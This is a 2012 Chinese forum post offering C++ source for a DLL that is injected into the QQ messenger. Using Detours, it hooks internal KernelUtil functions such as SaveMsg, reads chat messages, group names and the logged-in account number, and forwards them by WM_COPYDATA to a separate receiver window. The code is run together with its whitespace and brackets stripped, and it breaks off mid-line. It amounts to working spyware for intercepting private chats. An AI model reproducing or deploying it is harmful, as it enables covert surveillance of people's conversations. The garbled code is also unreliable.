hookQQ-API拦截QQ聊天记录

【原创】hookQQ-API拦截QQ聊天记录作者:yinchengak时间:2012-06-13,20:37:56链接:=152085大家先对QQ采用ollydbg调试QQ，分析出相关QQ内部函数//?GetMsgTime@Msg@Util@@YA_JPAUITXMsgPack@@@Z//?GetSelfUin@Contact@Util@@YAKXZ//?GetGroupName@Group@Util@@YA?AVCTXStringW@@K@Z//?GetDiscussName@Group@Util@@YA?AVCTXStringW@@K@Z//?GetGroupMemLongNickname@Group@Util@@YAHKKAAVCTXStringW@@@Z//?GetGroupMemShowName@Group@Util@@YA?AVCTXStringW@@KK@Z//?GetSelfUin@Contact@Util@@YAKXZ然后我们写一个ＤＬＬ来注射到ＱＱ内部，调用ＱＱ相关函数，获取相关QQ聊天记录信息，然后将QQ聊天记录用sendmessage发送出来。DLL代码如下代码:#includestdafx.h#includeQQspy.h#includedetours.h#pragmacomment(lib,detours.lib)#includeset#includeshlwapi.h#pragmacomment(lib,shlwapi.lib)#ifdef_DEBUG#definenewDEBUG_NEW#undefTHIS_FILEstaticcharTHIS_FILE[]=__FILE__;#endif////Note!////IfthisDLLisdynamicallylinkedagainsttheMFC//DLLs,anyfunctionsexportedfromthisDLLwhich//callintoMFCmusthavetheAFX_MANAGE_STATEmacro//addedattheverybeginningofthefunction.////Forexample:////externCBOOLPASCALEXPORTExportedFunction()//{//AFX_MANAGE_STATE(AfxGetStaticModuleState());////normalfunctionbodyhere//}////Itisveryimportantthatthismacroappearineach//function,priortoanycallsintoMFC.Thismeansthat//itmustappearasthefirststatementwithinthe//function,evenbeforeanyobjectvariabledeclarations//astheirconstructorsmaygeneratecallsintotheMFC//DLL.////PleaseseeMFCTechnicalNotes33and58foradditional//details./////////////////////////////////////////////////////////////////////////////////CQQMonAppBEGIN_MESSAGE_MAP(CQQMonApp,CWinApp)//{{AFX_MSG_MAP(CQQMonApp)//NOTE-theClassWizardwilladdandremovemappingmacroshere.//DONOTEDITwhatyouseeintheseblocksofgeneratedcode!//}}AFX_MSG_MAPEND_MESSAGE_MAP()///////////////////////////////////////////////////////////////////////////////CQQMonAppconstructionCQQMonApp::CQQMonApp(){//TODO:addconstructioncodehere,//PlaceallsignificantinitializationinInitInstance}///////////////////////////////////////////////////////////////////////////////TheoneandonlyCQQMonAppobjectCQQMonApptheApp;//定义函数类型typedefBOOL(__cdecl*M_SaveMsg_1)(LPCWSTRlpStr,DWORDdTo_Num,DWORDdFrom_Num,DWORDdTo_Num_2,structITXMsgPack*TXMsgPack,structITXData*TXData);typedefBOOL(__cdecl*M_SaveMsg_2)(wchar_t*group,wchar_t*un_1,wchar_t*username,wchar_t*un_1_,intnum_1,intnum_2,structITXMsgPack*TXMsgPack,structITXData*TXData);//?GetMsgTime@Msg@Util@@YA_JPAUITXMsgPack@@@Ztypedefint(__cdecl*M_GetMsgTime)(structITXMsgPack*TXMsgPack);//?GetSelfUin@Contact@Util@@YAKXZtypedeflong(__cdecl*M_GetSelfUin)(void);//typedefPVOID(__cdecl*M_GetPublicName)(LPWSTR*lpBuffer,DWORDdQQNum);//?GetGroupName@Group@Util@@YA?AVCTXStringW@@K@ZtypedefPVOID(__cdecl*M_GetGroupName)(LPWSTR*lpBuffer,DWORDdGroupNum);//?GetDiscussName@Group@Util@@YA?AVCTXStringW@@K@ZtypedefPVOID(__cdecl*M_GetDiscussName)(LPWSTR*lpBuffer,DWORDdGroupNum);//?GetGroupMemLongNickname@Group@Util@@YAHKKAAVCTXStringW@@@Ztypedefint(__cdecl*M_GetGroupMemLongNickname)(unsignedlong,unsignedlong,CString&);//?GetGroupMemShowName@Group@Util@@YA?AVCTXStringW@@KK@ZtypedefPVOID(__cdecl*M_GetGroupMemShowName)(ULONG,ULONG);//?GetSelfUin@Contact@Util@@YAKXZtypedeflong(__cdecl*M_GetSelfUin)(void);//typedefPVOID(__cdecl*M_GetMsgAbstract)(PVOIDlpPar_1,structITXMsgPack*TXMsgPack);//定义函数指针M_SaveMsg_1OldSaveMsg_1=NULL;M_SaveMsg_2OldSaveMsg_2=NULL;M_SaveMsg_1TrueSaveMsg_1=NULL;M_SaveMsg_2TrueSaveMsg_2=NULL;M_GetMsgAbstractTrueGetMsgAbstract=NULL;M_GetMsgTimeTrueGetMsgTime=NULL;M_GetGroupNameTrueGetGroupName=NULL;M_GetDiscussNameTrueGetDiscussName=NULL;M_GetPublicNameTrueGetPublicName=NULL;M_GetSelfUinTrueGetSelfUin=NULL;M_GetSelfUinOldGetSelfUin=NULL;M_GetGroupMemLongNicknameTrueGetGroupMemLongNickname=NULL;M_GetGroupMemShowNameTrueGetGroupMemShowName=NULL;//定义HOOK函数BOOL__cdeclNewSaveMsg_1(LPCWSTRlpStr,DWORDdTo_Num,DWORDdFrom_Num,DWORDdTo_Num_2,structITXMsgPack*TXMsgPack,structITXData*TXData);BOOL__cdeclNewSaveMsg_2(wchar_t*group,wchar_t*un_1,wchar_t*username,wchar_t*un_1_,intnum_1,intnum_2,structITXMsgPack*TXMsgPack,structITXData*TXData);//测试娱乐int__cdeclNewGetSelfUin(void){return475318423;}VOID__cdeclSendinfo(CStringstr){COPYDATASTRUCTmyCopyDATA;myCopyDATA.cbData=str.GetLength();myCopyDATA.lpData=str.GetBuffer(0);str.ReleaseBuffer();HWNDhwnd=::FindWindow(NULL,QQ-聊天记录接收);if(hwnd){::SendMessage(hwnd,WM_COPYDATA,NULL,(LPARAM)&myCopyDATA);}else{AfxMessageBox(_T(发送失败！));}}VOID__stdcallJoker(){ULONGfnGetSelfUin;ULONGcurrentQQ;fnGetSelfUin=(ULONG)GetProcAddress(GetModuleHandleA(KernelUtil),?GetSelfUin@Contact@Util@@YAKXZ);if(fnGetSelfUin){currentQQ=((ULONG(__cdecl*)())fnGetSelfUin)();if(currentQQ){charbuf[64];wsprintfA(buf,新登录QQ:%d,currentQQ);CStringfff=buf;fff=fff+\r\n;OutputDebugString(fff);theApp.filename=buf;Sendinfo(fff);}}}BOOLCQQMonApp::InitInstance(){//TODO:Addyourspecializedcodehereand/orcallthebaseclassOutputDebugString(HookStart);//确保加载过KernelUtil.dllHMODULEhModule=NULL;hModule=GetModuleHandle(_T(KernelUtil.dll));if(hModule==NULL){hModule=LoadLibrary(KernelUtil.dll);}//获得所需函数的地址TrueSaveMsg_1=(M_SaveMsg_1)GetProcAddress(hModule,?SaveMsg@Msg@Util@@